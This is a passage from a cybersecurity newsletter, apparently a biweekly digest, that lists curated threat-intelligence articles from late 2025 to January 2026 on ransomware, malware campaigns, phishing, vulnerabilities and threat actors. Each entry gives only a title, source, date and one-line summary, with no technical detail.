Security Signals (1/13/26-1/27/26)

Welcome to your biweekly digest of curated cybersecurity intelligence.

Every two weeks, we bring you expert insights and handpicked articles covering the latest threats, threat actor activity, vulnerabilities, incident trends, and defensive strategies. Whether you’re on the front lines or shaping your organization’s security posture, Security Signals delivers the information you need to stay informed and ready.

For more articles, check out our #onpatrol4malware blog.

Turn Insights Into Action with Free Threat Intel

Security Signals gives you the insights and our Risk Indicators OSINT feeds help you apply them.

This Edition’s Articles

Late January 2026 Cyber Threat Reports spotlight real-world abuse of trusted platforms and exposed infrastructure – from LockBit 5.0 and KONNI to BRICKSTORM, Gootloader-style delivery tricks, and attacks leveraging tools like Visual Studio Code, PAN-OS GlobalProtect, and Google Gemini. Expect recurring themes of phishing/credential theft, malware staging, and operational tooling that turns everyday enterprise workflows into attack paths.

Planned failure: Gootloader’s malformed ZIP actually works perfectly

Source: Expel
(Published: 15 January 2026)
Gootloader malware is delivered to victims in a ZIP archive and the ZIP itself is designed to bypass detection. Read more.


Keylogger targets 200,000+ employees at major US bank

Source: Sansec
(Published: 15 January 2026)
Sansec discovered an active keylogger on the employee merchandise store of a top 3 US bank. Read more.


Inside LockBit 5.0: Analyzing the Ransomware Group’s Latest Affiliate Panel and Encryption Variants

Source: Flare
(Published: 16 January 2026)
The leaked materials provide unprecedented visibility into LockBit’s affiliate management system, showing the interface used by ransomware operators to coordinate attacks and manage victim negotiations. Read more.


Remcos RAT Being Distributed to Korean Users

Source: ASEC (AhnLab)
(Published: 16 January 2026)
AhnLab SEcurity intelligence Center (ASEC) has confirmed the distribution of the Remcos RAT targeting users in South Korea. Read more.


Mandiant releases rainbow table that cracks weak admin password in 12 hours

Source: Ars Technica
(Published: 16 January 2026)
Windows laggards still using the vulnerable hashing function: Your days are numbered. Read more.


Poland Under Intensified DDoS Siege: Weekly DDoS Threat Intelligence Analysis

Source: SOCRadar
(Published: 18 January 2026)
Between 12 and 18 January 2026, SOCRadar identified an intensive coordinated DDoS campaign conducted by the pro-Russian threat actor NoName057(16) and their DDoSia attack tool. Read more.


CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal

Source: Palo Alto Networks
(Published: 19 January 2026)
A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Read more.


NCSC issues warning over hacktivist groups disrupting UK organisations and online services

Source: UK National Cyber Security Centre (NCSC)
(Published: 19 January 2026)
New alert warns of state-aligned hacktivists targeting UK organisations, looking to cripple services and disable websites. Read more.


Hacker admits to leaking stolen Supreme Court data on Instagram

Source: BleepingComputer
(Published: 19 January 2026)
A Tennessee man has pleaded guilty to hacking the U.S. Supreme Court’s electronic filing system and breaching accounts at the AmeriCorps U.S. federal agency and the Department of Veterans Affairs. Read more.


Broker who sold malware to the FBI set for sentencing

Source: The Register
(Published: 19 January 2026)
Feras Khalil Ahmad Albashiti, 40, admitted to facilitating cyberattacks on at least 50 companies stateside. Read more.


Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina’s Judicial Sector to Deploy a Covert RAT

Source: Seqrite
(Published: 19 January 2026)
Seqrite Labs has identified and uncovered a globally active spear-phishing campaign targeting Argentina’s judicial sector. Read more.


Weaponizing Calendar Invites: A Semantic Attack on Google Gemini

Source: Miggo
(Published: 19 January 2026)
A standard calendar invite became an attack vector, exposing how prompt injection in Google Gemini bypassed privacy controls through language alone. Read more.


Kimwolf Botnet Lurking in Corporate, Govt. Networks

Source: Krebs on Security
(Published: 20 January 2026)
A new Internet-of-Things (IoT) botnet called Kimwolf has spread to more than 2 million devices, forcing infected systems to participate in massive distributed denial-of-service (DDoS) attacks and to relay other malicious and abusive Internet traffic. Read more.


BRICKSTORM Malware Report Highlights the Criticality of Network-Derived Telemetry

Source: Gigamon
(Published: 20 January 2026)
Although GTIG laments the lack of security telemetry in its analysis of the BRICKSTORM malware, network-derived telemetry from the analysis of network traffic is a rich source that can and should be leveraged by threat hunters and IR teams. Read more.


Inside a Multi-Stage Windows Malware Campaign

Source: Fortinet (FortiGuard Labs)
(Published: 20 January 2026)
FortiGuard Labs recently identified a multi-stage malware campaign primarily targeting users in Russia. Read more.


IntelBroker Unmasked – The Story of Hacker Kai Logan West

Source: Picus Security
(Published: 20 January 2026)
If you’ve been following cybersecurity news lately, you’ve almost certainly heard the name “IntelBroker.” Read more.


Threat Actors Expand Abuse of Microsoft Visual Studio Code

Source: Jamf
(Published: 20 January 2026)
Jamf Threat Labs identifies additional abuse of Visual Studio Code. Read more.


Predator bots are exploiting APIs at scale. Here’s how defenders must respond.

Source: CyberScoop
(Published: 20 January 2026)
With malicious bots now accounting for roughly 37% of all web traffic, security teams are left feeling like they’re playing a giant game of bot whack-a-mole. Read more.


PyPI Package Impersonates SymPy to Deliver Cryptomining Malware

Source: Socket
(Published: 21 January 2026)
Socket’s Threat Research Team identified a malicious PyPI package, sympy-dev, that impersonates SymPy, a widely used symbolic mathematics library with roughly 85 million downloads per month. Read more.


Peruvian Peaks: The digital loan illusion

Source: Group-IB
(Published: 21 January 2026)
A deep dive into loan phishing scams in Peru and Latin America. Read more.


Detailed Analysis of LockBit 5.0

Source: S2W (Medium)
(Published: 21 January 2026)
The LockBit ransomware group was affiliated with the Maze ransomware cartel, but after Maze announced its retirement, it began operating independently under the name ABCD ransomware starting in September 2019. Read more.


Phishing kits adapt to the script of callers

Source: Okta
(Published: 22 January 2026)
The threat actor convinces the targeted user to navigate in their browser to the phishing site under the pretext of an IT support or security requirement. Read more.


KONNI Adopts AI to Generate PowerShell Backdoors

Source: Check Point Research
(Published: 22 January 2026)
The PowerShell backdoor strongly indicates AI-assisted development rather than traditional operator-authored malware. Read more.


Weaponized in China, Deployed in India: The SyncFuture Espionage Targeted Campaign

Source: eSentire
(Published: 22 January 2026)
eSentire’s Threat Response Unit tracks this activity as “SyncFuture Espionage campaign” based on the abuse of SyncFuture/Yangtu enterprise software and a sophisticated multi-stage infection chain targeting Indian entities. Read more.


Microsoft Gave FBI Keys To Unlock Encrypted Data, Exposing Major Privacy Flaw

Source: Forbes
(Published: 22 January 2026)
Microsoft confirmed it does provide BitLocker recovery keys if it receives a valid legal order. Read more.


ErrTraffic: Inside a GlitchFix Attack Panel

Source: Censys
(Published: 20 January 2026)
ErrTraffic is a Traffic Distribution System (TDS) designed specifically for ClickFix-like campaigns. Read more.


Microsoft shared BitLocker keys with FBI, raising privacy fears

Source: TechRepublic
(Published: 26 January 2026)
Microsoft confirmed it can hand over BitLocker recovery keys stored in the cloud under warrant, reviving debate over who controls encrypted data. Read more.


Want more articles? Check out the previous edition of Security Signals here. 

Take advantage of our free data evaluation.

Security Signals (12/30/25-01/13/26)

This Edition’s Articles

These early January 2026 cyber threat reports showcase how attackers are actively abusing trusted software, exposed infrastructure, and popular platforms to reach victims at scale. This roundup highlights GoBruteforcer server attacks, UAT-7290 telecom targeting, fake WinRAR installers delivering malware, malicious Chrome extensions abusing AI tools, and ongoing MacSync stealer campaigns impacting macOS users.

APT36: Multi-Stage LNK Malware Campaign Targeting Indian Government Entities

Source: CYFIRMA
(Published: 30 December 2025)
CYFIRMA has identified a targeted malware campaign attributed to APT36 (Transparent Tribe), a Pakistan-aligned threat actor actively engaged in cyber espionage operations against Indian governmental, academic, and strategic entities. Read more.


From Victim to Vector: How Infostealers Turn Legitimate Businesses into Malware Hosts

Source: InfoStealers
(Published: 30 December 2025)
This entry in the Hudson Rock database means that a computer – likely belonging to a developer or admin at jrqsistemas.com – was infected by an Infostealer. Read more.


2 Security Experts Plead Guilty In BlackCat Ransomware Case

Source: The Cyber Express
(Published: 30 December 2025)
Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were indicted in the BlackCat ransomware case in October. Read more.


Knownsec Data Breach: A Trove of Espionage Tradecraft with an Insider Narrative

Source: Resecurity
(Published: 31 December 2025)
The Knownsec leak is a pivotal incident of 2025 because it exposed the inner workings of a major state-linked Chinese cybersecurity firm, revealed espionage tools and global targets, internal documentation, and evidence of ongoing cyber operations targeting other countries. Read more.


VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion

Source: Unit 42 (Palo Alto Networks)
(Published: 2 January 2026)
This article details our technical analysis of VVS stealer, also styled VVS $tealer, including its distributors’ use of obfuscation and detection evasion. Read more.


Resurgence of Scattered Lapsus$ hunters

Source: CYFIRMA
(Published: 3 January 2026)
Recent monitoring of underground forums and Telegram communities has identified the resurgence of the Scattered Lapsus$ collective. Read more.


D-Link DSL/DIR/DNS Command Injection via DNS Configuration Endpoint

Source: VulnCheck
(Published: 5 January 2026)
Severity: critical. Read more.


NordVPN Denies Breach After Hacker Leaks Data

Source: SecurityWeek
(Published: 6 January 2026)
The VPN company has conducted an investigation after a threat actor claimed to have hacked its systems. Read more.


Phishing actors exploit complex routing and misconfigurations to spoof domains

Source: Microsoft Security Blog
(Published: 6 January 2026)
Any third-party connectors – such as a spam filtering service, security solution, or archiving service – must be configured properly or spoof detections cannot be calculated correctly, allowing phishing emails such as the examples below to be delivered. Read more.


The Great VM Escape: ESXi Exploitation in the Wild

Source: Huntress
(Published: 7 January 2026)
In December 2025, Huntress observed an intrusion leading to the deployment of VMware ESXi exploits. Read more.


Malicious NPM Packages Deliver NodeCordRAT

Source: Zscaler ThreatLabz
(Published: 7 January 2026)
Zscaler ThreatLabz regularly monitors the `npm` database for suspicious packages. Read more.


Researchers rush to warn defenders of max-severity defect in n8n

Source: CyberScoop
(Published: 7 January 2026)
Roughly 100,000 servers running the automated workflow platform for AI and other enterprise tools are potentially exposed to exploitation. Read more.


Chrome Extensions Impersonate AI Tools to Steal ChatGPT & DeepSeek Chats

Source: SOCRadar
(Published: 7 January 2026)
A recently uncovered malware campaign involving Chrome extensions demonstrates how seemingly legitimate AI-focused add-ons can be abused to quietly collect sensitive user data at scale. Read more.


Inside GoBruteforcer: AI-Generated Server Defaults, Weak Passwords, and Crypto-Focused Campaigns

Source: Check Point Research
(Published: 7 January 2026)
GoBruteforcer is a botnet that turns compromised Linux servers into scanning and password brute-force nodes. Read more.


UAT-7290 targets high value telecommunications infrastructure in South Asia

Source: Cisco Talos
(Published: 8 January 2026)
Cisco Talos is disclosing a sophisticated threat actor we track as UAT-7290, who has been active since at least 2022. Read more.


Fake WinRAR downloads hide malware behind a real installer

Source: Malwarebytes
(Published: 8 January 2026)
A member of our web research team pointed me to a fake WinRAR installer that was linked from various Chinese websites. Read more.


Maduro Arrest Used as a Lure to Deliver Backdoor

Source: Darktrace
(Published: 9 January 2026)
Darktrace researchers observed threat actors exploiting reports of Venezuelan President Maduro’s arrest to deliver backdoor malware. Read more.


MacSync stealer is using a notarized app to bypass Mac defenses

Source: Moonlock
(Published: 9 January 2026)
MacSync, the new macOS stealer in town, is back with new tricks. Read more.


Boto-Cor-de-Rosa campaign reveals Astaroth WhatsApp-based worm activity in Brazil

Source: Acronis Threat Research Unit
(Published: 8 January 2026)
In a newly identified campaign, internally referred to as Boto Cor-de-Rosa, our researchers discovered that Astaroth now exploits WhatsApp Web as part of its propagation strategy. Read more.


Under Medusa’s Gaze: How Darktrace Uncovers RMM Abuse in Ransomware Campaigns

Source: Darktrace
(Published: 8 January 2026)
Medusa ransomware increasingly exploits remote monitoring and management (RMM) tools for persistence, lateral movement, and data exfiltration. Read more.


Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant

Source: CloudSEK
(Published: 8 January 2026)
CloudSEK’s TRIAD recently identified a spear-phishing campaign attributed to the Muddy Water APT group targeting multiple sectors across the Middle East, including diplomatic, maritime, financial, and telecom entities. Read more.


North Korean Kimsuky Actors Leverage Malicious QR Codes in Spearphishing Campaigns Targeting U.S. Entities

Source: FBI IC3 (FLASH)
(Published: 8 January 2026)
The Federal Bureau of Investigation (FBI) is releasing this FLASH to alert NGOs, think tanks, academia, and other foreign policy experts with a nexus to North Korea of evolving tactics employed by the North Korean state-sponsored cyber threat group Kimsuky and to provide mitigation recommendations. Read more.


Iran Implements Nationwide Military Jamming to Cripple Starlink and Enforce Digital Blackout

Source: Reclaim The Net
(Published: 12 January 2026)
Iran’s government has expanded its control over digital communication, deploying military jamming systems that have largely disabled Starlink satellite access. Read more.


Stealthy malware masking its activity, deploying infostealer

Source: Kaspersky
(Published: 12 January 2026)
Our experts have detected a new wave of malicious emails targeting Russian private-sector organizations. Read more.


Hunting Lazarus: Inside the Contagious Interview C2 Infrastructure

Source: Red Asgard
(Published: 12 January 2026)
We found North Korean malware in a client’s Upwork project. Read more.


Unmasking the DPRK Remote Worker Problem

Source: Silent Push
(Published: 12 January 2026)
For decades, the “insider threat” was synonymous with the disgruntled staffer or the negligent contractor. Read more.



Security Signals (12/02/25-12/16/25)

This Edition’s Articles

Mid-December 2025 Cyber Threat Reports highlight how rapidly evolving threats are colliding with geopolitics, cloud infrastructure, and everyday consumer tech. This roundup spans everything from React2Shell mass exploitation to new Android banking malware, Mirai botnets at sea, and fresh ransomware tooling targeting ESXi and EDR.

Investigating an AiTM Phishing Campaign Targeting M365 and Okta

Source: Datadog Security Labs
(Published: 10 December 2025)
Datadog researchers detail an adversary-in-the-middle phishing campaign designed to bypass MFA protections for Microsoft 365 and Okta users. Read more.


Share ChatGPT Chat ClickFix: macOS AMOS Infostealer

Source: Kaspersky
(Published: 9 December 2025)
Kaspersky researchers describe a macOS infostealer campaign abusing fake ChatGPT sharing prompts to trick users into executing malicious commands. Read more.


Detecting Mythic C2 in Network Traffic

Source: Kaspersky Securelist
(Published: 11 December 2025)
This research outlines techniques for identifying Mythic command-and-control traffic using network-level indicators and behavioral patterns. Read more.


IT, Geopolitics, and Cyber Risk: How Global Tensions Shape the Attack Surface

Source: Rapid7
(Published: 11 December 2025)
Rapid7 examines how geopolitical instability influences cyber operations, threat actor targeting, and organizational risk exposure. Read more.


CyberVolk Returns: Flawed VolkLocker Brings New Features With Growing Pains

Source: SentinelOne
(Published: 10 December 2025)
SentinelOne analyzes the reemergence of CyberVolk ransomware, highlighting technical flaws alongside newly added capabilities. Read more.


Cato CTRL: Deep Dive Into New JSCeal Infostealer Campaign

Source: Cato Networks
(Published: 11 December 2025)
Cato Networks investigates a new JSCeal infostealer campaign leveraging obfuscated JavaScript to harvest credentials at scale. Read more.


What Happens to Stolen Data After Phishing Attacks?

Source: Kaspersky Securelist
(Published: 12 December 2025)
This article examines how stolen credentials and personal data are monetized, resold, and reused following phishing attacks. Read more.


The Infostealer to APT Pipeline: How Lazarus Hijacked a Yemen Disinformation Network

Source: Infostealers.com
(Published: 12 December 2025)
Researchers describe how the Lazarus Group leveraged infostealer infrastructure to compromise and repurpose a Yemen-based disinformation network. Read more.


Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite

Source: Unit 42 (Palo Alto Networks)
(Published: 11 December 2025)
Unit 42 researchers detail how Hamas-affiliated threat actor Ashen Lepus is using a new AshTag malware suite to target Middle Eastern diplomatic entities. Read more.


Apple fixes two zero-day flaws exploited in ‘sophisticated’ attacks

Source: BleepingComputer
(Published: 12 December 2025)
Apple has released emergency updates to patch two zero-day vulnerabilities that were exploited in an extremely sophisticated attack targeting specific individuals. Read more.


Operation MoneyMount-ISO – Deploying Phantom Stealer via ISO-Mounted Executables

Source: Seqrite
(Published: 12 December 2025)
At Seqrite Labs, we continuously monitor global cyber threat activity. Read more.


Threats Behind the Mask of Gentlemen Ransomware

Source: ASEC
(Published: 11 December 2025)
ASEC researchers analyze threats hidden behind the so-called Gentlemen ransomware, including its infection vector, encryption behavior, and tactics for evading detection. Read more.


Evolution of Composite Cyber Threats: 2025 Analysis and 2026 Key Response Strategies

Source: Medium (@nshcthreatrecon)
(Published: 15 December 2025)
This long-form analysis explores how composite cyber threats evolved in 2025 and outlines key response strategies defenders should prioritize in 2026. Read more.


Free Micropatches for Windows Remote Access Connection Manager DoS

Source: 0patch
(Published: 11 December 2025)
0patch ships free micropatches for a Windows Remote Access Connection Manager zero-day that attackers can abuse to gain Local System privileges on vulnerable hosts. Read more.


Microsoft Teams to Introduce External Domains Anomalies Report for Enhanced Security

Source: Cybersecurity News
(Published: 11 December 2025)
Microsoft is adding an External Domains Anomalies report to Teams so administrators can spot unusual communication patterns with outside tenants and clamp down on risky connections. Read more.


New DroidLock Malware Locks Android Devices and Demands a Ransom

Source: Cybersecurity News
(Published: 11 December 2025)
Researchers warn that the DroidLock Android malware is being pushed via phishing sites, locking victims’ phones for ransom while also enabling attackers to take remote control. Read more.


Notepad++ Vulnerability Let Attackers Hijack Network Traffic to Install Malware via Updates

Source: Cybersecurity News
(Published: 11 December 2025)
A vulnerability in Notepad++ update traffic could allow threat actors to intercept requests on the network and deliver malicious payloads disguised as legitimate software updates. Read more.


Threat actors exploit React2Shell CVE-2025-55182

Source: Google Cloud Threat Intelligence
(Published: 12 December 2025)
Google Threat Intelligence details how multiple actors quickly weaponized the React2Shell (CVE-2025-55182) remote code execution flaw in React Server Components to gain initial access to internet-facing services. Read more.


How NoName057(16) Uses DDoSia to Attack NATO Targets

Source: Picus Security
(Published: 14 December 2025)
Picus analyzes how pro-Russian hacktivist group NoName057(16) leverages its DDoSia platform to coordinate politically motivated DDoS attacks against NATO-aligned governments and organizations. Read more.


Frogblight threatens you with a court case: a new Android banker targets Turkish users

Source: Securelist
(Published: 15 December 2025)
Kaspersky describes Frogblight, an Android banking trojan distributed via smishing and fake government court case portals that steals banking credentials and can remotely control infected devices. Read more.


DDoS Threat Intelligence: Belgium, 15 Dec 2025

Source: SOCRadar
(Published: 15 December 2025)
SOCRadar details a DDoSia campaign by pro-Russian group NoName057(16) that generated thousands of DDoS attacks focusing on Belgium as well as Ukraine and other European targets between 8 and 14 December 2025. Read more.


Cyberattack on the Sun

Source: Cato Networks
(Published: 15 December 2025)
Cato Networks examines how insecure legacy protocols in solar power infrastructure could let attackers manipulate inverters at scale and cause widespread power disruption. Read more.


TR SantaStealer Is Coming to Town: A New, Ambitious Infostealer Advertised on Underground Forums

Source: Rapid7
(Published: 15 December 2025)
Rapid7 profiles SantaStealer, a new information-stealing malware-as-a-service offering on underground forums that targets browser, cryptocurrency wallet, and application credentials. Read more.


Phishing Kits: An Interactive Deep Dive

Source: Flare
(Published: 15 December 2025)
Flare takes an interactive look at modern phishing kits, showing how they bundle cloned login pages, evasion features, and automation to let low-skill actors harvest credentials at scale. Read more.


GhostPairing Attacks: from phone number to full access in WhatsApp

Source: Gen Digital
(Published: 15 December 2025)
Gen researchers describe GhostPairing, a WhatsApp account takeover technique where attackers trick victims into pairing an attacker-controlled device without ever stealing their password. Read more.


16TB of MongoDB Database Exposes 4.3 Billion Lead Gen Records

Source: Hackread
(Published: 15 December 2025)
Hackread reports on an unsecured 16TB MongoDB instance left open online that exposed over 4.3 billion professional lead generation records containing extensive personal and business data. Read more.


BreachForums Reemerges, Admin Apologizes for Honeypot Confusion, Claims the Attack the French Govt Announced Impacting Over 16M Individuals

Source: TechNadu
(Published: 15 December 2025)
TechNadu covers BreachForums administrators resurfacing to deny being a law enforcement honeypot while claiming responsibility for a French government data breach affecting more than 16 million people. Read more.


Kimsuky Distributing Malicious Mobile App via QR Code

Source: Enki White Hat
(Published: 16 December 2025)
Enki’s White Hat team analyzes new DOCSWAP APK variants delivered via QR code phishing sites and attributes the campaign to DPRK-aligned threat actor Kimsuky. Read more.


Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Source: Check Point Research
(Published: 16 December 2025)
Check Point Research exposes Chinese espionage actor Ink Dragon, showing how it turns compromised IIS servers into a ShadowPad-based relay mesh spanning government and telecom victims worldwide. Read more.


CastleRAT malware detection with Splunk and MITRE ATT&CK

Source: Splunk
(Published: 5 December 2025)
Splunk Threat Research shows how defenders can detect CastleRAT infections by mapping the malware’s behaviors to MITRE ATT&CK techniques and translating them into Splunk detections. Read more.


Hypervisor defenses against ransomware targeting ESXi

Source: Huntress
(Published: 8 December 2025)
Hypervisors are the backbone of modern virtualized environments, but when ransomware targets ESXi hosts the blast radius can quickly extend across an entire organization. Read more.


White Lynx uses CAPTCHA macros

Source: Unit 42 (Palo Alto Networks)
(Published: 8 December 2025)
This Unit 42 timely threat intel note documents a White Lynx phishing campaign that uses a CAPTCHA-themed Word macro to deliver malware and harvest victim credentials. Read more.


React2Shell exploitation escalates into mass attacks

Source: The Hacker News
(Published: 10 December 2025)
The Hacker News reports that a critical ReactPHP vulnerability dubbed React2Shell, tracked as CVE-2025-55182, is now being widely exploited to deploy web shells on vulnerable servers. Read more.


Windows PowerShell 0-day vulnerability allows attackers to execute malicious code

Source: Cybersecurity News
(Published: 10 December 2025)
Security researchers warn that a newly disclosed Windows PowerShell 0-day vulnerability could allow attackers to execute arbitrary code on Windows systems if it is abused by threat actors. Read more.


Fortinet FortiGate under active attack

Source: The Hacker News
(Published: 11 December 2025)
A critical flaw in Fortinet FortiOS and FortiProxy is being actively exploited, allowing attackers to bypass authentication on FortiGate devices and gain full control of vulnerable appliances. Read more.


NANOREMOTE, cousin of FINALDRAFT

Source: Elastic Security Labs
(Published: 11 December 2025)
In October 2025, Elastic Security Labs discovered a newly observed Windows backdoor in telemetry that they call NanoRemote, which closely resembles the FINALDRAFT implant. Read more.


Shanya emerges as top EDR-killing tool for ransomware gangs

Source: Techworm
(Published: 11 December 2025)
Techworm profiles Shanya, a new EDR-killing utility aggressively marketed to ransomware gangs for disabling security tools before encryption begins. Read more.


Intellexa leaks: Predator spyware operations exposed

Source: Amnesty International Security Lab
(Published: 11 December 2025)
Amnesty International’s Security Lab analyzes a large leak of Intellexa documents that exposes how the Predator spyware platform has been sold and deployed around the world. Read more.


Cracking ValleyRAT: from builder secrets to kernel rootkits

Source: Check Point Research
(Published: 12 December 2025)
Throughout 2025, Check Point Research tracked the evolution of ValleyRAT, following the malware from leaked builder tools to sophisticated kernel level rootkits used in the wild. Read more.


Technical analysis of the BlackForce phishing kit

Source: Zscaler
(Published: 12 December 2025)
Zscaler ThreatLabz provides a technical deep dive into the BlackForce phishing-as-a-service kit, which automates Microsoft 365 credential theft using reverse proxy techniques and extensive anti-analysis features. Read more.


China-Nexus Cyber Threat Groups Rapidly Exploit React2Shell Vulnerability (CVE-2025-55182)

Source: AWS Security Blog
(Published: 4 December 2025)
Within hours of the React2Shell CVE-2025-55182 disclosure, Amazon threat intelligence teams observed multiple China-nexus actors attempting to exploit vulnerable Next.js applications at scale. Read more.


Advent of Configuration Extraction – Part 2: Unwrapping QuasarRAT’s Configuration

Source: Sekoia.io
(Published: 8 December 2025)
This second installment of the Advent of Configuration Extraction series shows how analysts can unpack QuasarRAT samples and extract their encrypted configuration from the .NET binary. Read more.


BYOVD Loader Deploys DeadLock Ransomware

Source: Talos Intelligence
(Published: 9 December 2025)
Cisco Talos details a new bring-your-own-vulnerable-driver (BYOVD) loader used to disable security products and deploy DeadLock ransomware in targeted attacks. Read more.


Cydome Identifies Broadside, a New Mirai Botnet Variant Targeting Maritime IoT

Source: Cydome
(Published: 3 December 2025)
Cydome researchers uncover Broadside, a Mirai-based botnet variant that abuses weakly secured maritime IoT devices to build a DDoS-capable fleet. Read more.


Malicious VSCode Extension Launches Multi-Stage Attack Chain with Anivia Loader and OctoRAT

Source: Hunt.io
(Published: 3 December 2025)
Hunt.io describes a malicious Visual Studio Code extension that delivers a multi-stage attack chain, ultimately deploying the Anivia loader and OctoRAT for persistent remote control. Read more.


SMS Phishers Pivot to Points, Taxes, Fake Retailers

Source: Krebs on Security
(Published: 4 December 2025)
Brian Krebs reports that China-based SMS phishing crews now sell phishing kits for mass-creating fake e-commerce sites that funnel victims’ card data into mobile wallets, alongside lures about tax refunds and rewards points. Read more.


OSINT Kitten: The Headquarters for Hacktivist Operations Against Israel

Source: Medium
(Published: 5 December 2025)
This investigation profiles OSINT Kitten as a coordination hub for hacktivist campaigns targeting Israel, outlining how propaganda, leaks, and operational chatter intersect on the platform. Read more.


Inside Shanya: A Packer-as-a-Service Fueling Modern Attacks

Source: Sophos News
(Published: 6 December 2025)
Sophos examines Shanya, a packer-as-a-service offering that ransomware groups increasingly use to obfuscate payloads, evade analysis, and extend the lifespan of their campaigns. Read more.


Nothing to Steal? Let’s Wipe. We Are Analyzing the Shai Hulud 2.0 npm Worm

Source: Securelist (Kaspersky)
(Published: 9 December 2025)
Kaspersky researchers dissect Shai Hulud 2.0, a destructive npm worm that abuses developer tooling and supply chain trust to spread and wipe systems instead of stealing data. Read more.


Cato CTRL: Weaponizing Claude Skills with MedusaLocker

Source: Cato Networks
(Published: 10 December 2025)
Cato Networks describes a red-team simulation in which an attacker modeled on MedusaLocker operators combines LLM-driven automation built on Claude Skills with C2 infrastructure to accelerate discovery, lateral movement, and impact. Read more.


New eBPF Filters for Symbiote and BPFdoor Malware

Source: Fortinet
(Published: 9 December 2025)
Fortinet introduces new eBPF-based detection filters that help defenders identify and hunt for stealthy Linux threats such as Symbiote and BPFdoor in production environments. Read more.


UDPGangster Campaigns Target Multiple Countries

Source: Fortinet
(Published: 4 December 2025)
FortiGuard Labs reveals UDPGangster, a UDP-based backdoor linked to MuddyWater that is being used in campaigns against organizations across several Middle Eastern and neighboring states. Read more.


Investigating Indonesia’s Gambling Ecosystem: Indicators of National-Level Cyber Operations

Source: Malanta
(Published: 3 December 2025)
Malanta’s research team maps Indonesia’s online gambling infrastructure and highlights technical and behavioral indicators that could signal involvement by state-linked operators. Read more.


Deceptive Layoff-Themed HR Email Distributes Remcos RAT Malware

Source: Seqrite
(Published: 9 December 2025)
Seqrite analyzes phishing emails masquerading as layoff notifications that deliver a weaponized attachment used to install the Remcos remote access trojan. Read more.


Operation DupeHike: UNG0902 Targets Russian Employees with DupeRunner and AdaptixC2

Source: Seqrite
(Published: 3 December 2025)
This report documents Operation DupeHike, in which the UNG0902 group uses phishing lures, the custom DupeRunner malware, and the open-source AdaptixC2 framework to target employees in Russia. Read more.


Africa in the Crosshairs: Covert Influence, Cyber Operations, and the New Geopolitics

Source: Silobreaker
(Published: 9 December 2025)
Silobreaker explores how non-Western powers use information operations, cyber activity, and local partnerships to shape narratives and political outcomes across Africa. Read more.


AI-Automated Threat Hunting Brings GhostPenguin Out of the Shadows

Source: Trend Micro
(Published: 8 December 2025)
Trend Micro introduces GhostPenguin, a previously undocumented Linux backdoor discovered through AI-assisted threat hunting and low-detection telemetry analysis. Read more.


Dangerous Invitations: Russian Threat Actor Spoofs European Security Events in Targeted Phishing Attacks

Source: Volexity
(Published: 4 December 2025)
Volexity details a campaign in which a Russian threat actor sends spoofed invitations to high-profile European security conferences to deliver malware to selected targets. Read more.


Attackers Actively Exploiting Critical Vulnerability in King Addons for Elementor Plugin

Source: Wordfence
(Published: 2 December 2025)
Wordfence warns that a critical privilege escalation flaw in the King Addons for Elementor plugin is under active exploitation, enabling unauthenticated attackers to gain admin access. Read more.


Technical Analysis of Matanbuchus 3.0

Source: Zscaler
(Published: 2 December 2025)
Zscaler ThreatLabz provides a deep technical dive into Matanbuchus 3.0, a C++ downloader malware-as-a-service that now plays a growing role in ransomware operations. Read more.


Want more articles? Check out the previous edition of Security Signals here. 


Take advantage of our free data evaluation.


Security Signals (11/18/25-12/02/25)

This Edition’s Articles

November to December 2025 Cyber Threat Reports bring together a fast-moving mix of supply chain compromises, ransomware evolutions, APT operations, and cloud-targeted attacks. This roundup highlights how actors are abusing npm ecosystems, targeting SSO and identity platforms, and weaponizing IoT and banking malware, giving your team timely context to tune detections and prioritize defenses.


Autumn Dragon: China-nexus APT Group Targets South East Asia

Source: CyberArmor
(Published: 18 November 2025)
Since early 2025, China’s involvement in the Indo-Pacific has become more prolific, from escalating maritime tensions to acting as peace broker for Myanmar’s military junta and, more recently, espionage against the joint exercises that the Philippine naval forces have been conducting with the US, Australia, Canada and New Zealand. Read more.


Cloudflare outage on November 18, 2025

Source: Cloudflare
(Published: 18 November 2025)
On November 18, 2025, Cloudflare experienced an outage that affected a portion of traffic on its network. Read more.


Fortinet warns of new FortiWeb zero-day exploited in attacks

Source: BleepingComputer
(Published: 18 November 2025)
Today, Fortinet released security updates to patch a new FortiWeb zero-day vulnerability that threat actors are actively exploiting in attacks. Read more.


Breaking Down S3 Ransomware: Variants, Attack Paths and Trend Vision One™ Defenses

Source: Trend Research
(Published: 18 November 2025)
Ransomware is shifting from traditional systems to cloud environments, redefining its impact on cloud-native data. Read more.


Masked in Memory: A Hidden .PYC Fragment Utilises cvtres.exe to Communicate With C&C

Source: K7 Labs
(Published: 19 November 2025)
During a routine analysis at K7 Labs, we encountered a Python-based malware sample that uses multi-stage obfuscation. Read more.


The Cloudflare Outage May Be a Security Roadmap

Source: Krebs on Security
(Published: 19 November 2025)
An intermittent outage at Cloudflare on Tuesday briefly knocked many of the Internet’s top destinations offline. Read more.


Cooking up trouble: How TamperedChef uses signed apps to deliver stealthy payloads

Source: Acronis Threat Research Unit
(Published: 19 November 2025)
Acronis Threat Research Unit (TRU) observed a global malvertising / SEO campaign, tracked as “TamperedChef.” Read more.


Meet ShinySp1d3r: New Ransomware-as-a-Service created by ShinyHunters

Source: BleepingComputer
(Published: 19 November 2025)
An in-development build of the ShinySp1d3r ransomware-as-a-service platform has surfaced, offering an early look at the extortion operation before its launch. Read more.


PlushDaemon compromises network devices for adversary-in-the-middle attacks

Source: ESET WeLiveSecurity
(Published: 19 November 2025)
ESET researchers provide insights into how PlushDaemon performs adversary-in-the-middle attacks using a previously undocumented network implant called EdgeStepper. Read more.


Beyond the Watering Hole: APT24’s Pivot to Multi-Vector Attacks

Source: Google Cloud
(Published: 20 November 2025)
Google Threat Intelligence Group (GTIG) is tracking a long-running and adaptive cyber espionage campaign by APT24, a People’s Republic of China (PRC)-nexus threat actor. Read more.


ToddyCat: your hidden email assistant. Part 1

